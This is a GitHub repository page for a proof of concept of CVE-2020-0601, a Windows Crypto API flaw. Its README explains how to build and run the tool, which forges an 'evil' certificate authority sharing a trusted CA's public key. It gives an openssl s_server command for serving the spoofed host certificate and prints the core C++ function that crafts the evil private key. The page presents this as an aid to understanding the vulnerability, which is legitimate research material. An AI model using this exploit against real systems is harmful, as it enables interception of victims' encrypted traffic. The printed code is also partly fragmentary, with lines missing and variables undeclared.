Skip to content
CVE-2020-0601 proof of concept
C++ CMake C
Branch: master
Clone or download

Latest commit

Fetching latest commit…
Cannot retrieve the latest commit at this time.


Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore initial version Feb 18, 2020
CMakeLists.txt initial version Feb 18, 2020
FindCryptoPP.cmake initial version Feb 18, 2020 cosmetic fix of wording Feb 19, 2020
cve-2020-0601_poc.cpp initial version Feb 18, 2020
cve-2020-0601_poc.h initial version Feb 18, 2020
main.cpp initial version Feb 18, 2020
openssl-helper.cpp initial version Feb 18, 2020
openssl-helper.h initial version Feb 18, 2020
screen1.png initial version Feb 18, 2020

Basic Info

The source code of this tool is supposed to help with understanding of CVE-2020-0601 vulnerability discovered in Windows Crypto API, see CERT's overview.

The tool itself can be used to produce a certificate for an arbitrary domain which will be signed by an evil certificate authority. This tool produces evil CA with the same public key as the one provided on command line.

When a web browser of a vulnerable Windows build targets this certificate, it will be considered as the trusted one. Thus allows suitably positioned network-based attacker to intercept victim's traffic.


Launch the tool providing path to a trusted Windows certificate:

./cve-2020-0601_poc ~/path/to/USERTrustECCCertificationAuthority.crt

In the example above a USERTrust ECC Certification Authority is used with the following public key:


The tool will save several certificates and keys in its current working directory:

test-cve_evil-ca.crt -- evil CA
test-cve_evil-privkey.key -- evil CA's private key in PEM format
test-cve_evil-privkey-pk8.key -- evil CA's private key in PKCS#8 format
test-cve_host-cert.crt -- target host's certificate ( by default)
test-cve_host-privkey.key -- target host's private key ( by default)

To test certificates launch openssl s_server as follows and redirect request towards it requests of from your vulnerable Windows box:

sudo openssl s_server -cert test-cve_host-cert.crt -key test-cve_host-privkey.key -chainCAfile test-cve_evil-ca.crt -www -accept 443

Be sure that the original certificate is cached!

The result should look like this one: spoofing


cmake is used to generate make file to build this tool. As dependencies the following libraries are needed:

  • openssl (> 1.0)
  • cryptopp


mkdir build
cd build
cmake ..


Comprehensive (relatively) description at some point will be added to Gremwell's website.

Start with looking at main.cpp file. It calls various OpenSSL wrappers which are important, but are not related to the vulnerability itself. The most interesting part is in cve-2020-0601_poc.cpp file:

bool craftEvilPrivKey(const char *caPubKeyRaw, size_t caPubKeyRawLen,
                      char *outEvilPrivKeyPKCS8, size_t maxSizePKCS8, size_t *outEvilPrivKeyPKCS8Len,
                      bool doSave, const char *evilPrivKeyFileName)
    // load public key of the provided certificate into native CryptoPP type
    DL_Keys_ECDSA<ECP>::PublicKey caPubKey;
    caPubKey.Load(CryptoPP::ArraySource((const CryptoPP::byte *)caPubKeyRaw,
                                         caPubKeyRawLen, true).Ref());

    // generate a private key using the same curve as in the provided CA certificate
    CryptoPP::AutoSeededRandomPool prng;
    DL_Keys_ECDSA<ECP>::PrivateKey privKeyBase;
    privKeyBase.Initialize(prng, caPubKey.GetGroupParameters());

    // get the private key elliptic curve parameters
    CryptoPP::Integer privKeyBaseExp = privKeyBase.GetPrivateExponent();
    ECP privKeyBaseCurve = privKeyBase.GetGroupParameters().GetCurve();
    CryptoPP::Integer privKeyBaseOrder = privKeyBase.GetGroupParameters().GetSubgroupOrder();

    // calculate an inverse value of the private key
    CryptoPP::Integer privKeyInverse = CryptoPP::EuclideanMultiplicativeInverse(privKeyBaseExp, privKeyBaseOrder);
    // produce our custom generator (base point) as a multiplication of the inverse value of our private key
    // and the public key of the provided CA certificate
    ECP::Point caPubKeyQ = caPubKey.GetPublicElement();
    ECP::Point evilG = privKeyBaseCurve.ScalarMultiply(caPubKeyQ, privKeyInverse);

    // create an "evil" private key object using the base private's key exponent and curve but
    // with our "evil" generator (base point)
    DL_Keys_ECDSA<ECP>::PrivateKey evilPrivKey;
    evilPrivKey.Initialize(privKeyBaseCurve, evilG, privKeyBaseOrder, privKeyBaseExp);

    // convert evil private key into PKCS8 format
    CryptoPP::ArraySink evilPrivKeyPKCS8As((CryptoPP::byte *)outEvilPrivKeyPKCS8, maxSizePKCS8);
    *outEvilPrivKeyPKCS8Len = evilPrivKeyPKCS8As.TotalPutLength();

    if (doSave) {
        // save it as-is so this can be imported by some tools

    // the code below converts the key to DER format
    // however, as we have here our custom curve (not the "named" one), most of the
    // tools are not able to properly import it. thus, leaving this code commented-out
    CryptoPP::ArraySink evilPrivKeyDerAs((CryptoPP::byte *)outEvilPrivKeyDer, maxSizeDer);
    privKeyToDer(evilPrivKey, evilPrivKeyDerAs.Ref());
    *outEvilPrivKeyDerLen = evilPrivKeyDerAs.TotalPutLength();

    return true;

Comments here should be quite self-explanatory. :-)


Thanks to kudelskisecurity blog and references mentioned there.

You can’t perform that action at this time.